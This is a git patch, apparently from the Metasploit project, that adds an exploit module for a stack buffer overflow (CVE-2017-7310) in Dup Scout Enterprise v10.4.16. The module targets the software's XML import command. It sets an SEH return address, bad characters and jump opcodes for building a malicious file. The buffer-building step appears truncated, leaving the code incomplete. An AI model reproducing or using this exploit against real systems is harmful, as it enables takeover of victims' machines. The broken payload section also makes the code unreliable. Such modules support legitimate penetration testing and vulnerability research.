From 4cd5801e6fbb35a3772a00b7061c9b76a744c4ed Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Wed, 24 Jan 2018 20:47:46 +0000 Subject: [PATCH] Dup Scout Import Command Buffer Overflow --- .../windows/fileformat/dupscout_xml.rb | 71 +++++++++++++++++++ 1 file changed, 71 insertions(+) create mode 100644 modules/exploits/windows/fileformat/dupscout_xml.rb diff --git a/modules/exploits/windows/fileformat/dupscout_xml.rb b/modules/exploits/windows/fileformat/dupscout_xml.rb new file mode 100644 index 0000000000..9047117015 --- /dev/null +++ b/modules/exploits/windows/fileformat/dupscout_xml.rb @@ -0,0 +1,71 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow', + 'Description' => %q( + This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16 + by using the import command option to import a specially crafted xml file. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Daniel Teixeira' + ], + 'References' => + [ + [ 'CVE', '2017-7310' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'seh', + 'DisablePayloadHandler' => 'true' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x01\x02\x0a\x0b\x0c\x22\x27", + 'StackAdjustment' => -3500 + }, + 'Targets' => + [ + ['Windows Universal', { 'Ret' => 0x651BB77A } ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Mar 29 2017', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [true, 'The file name.', 'msf.xml']) + ]) + end + + def exploit + esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76] + jmp = "\xFF\xE0" # JMP ESP + + buffer = "\n" + + print_status("Creating '#{datastore['FILENAME']}' file ...") + file_create(buffer) + end +end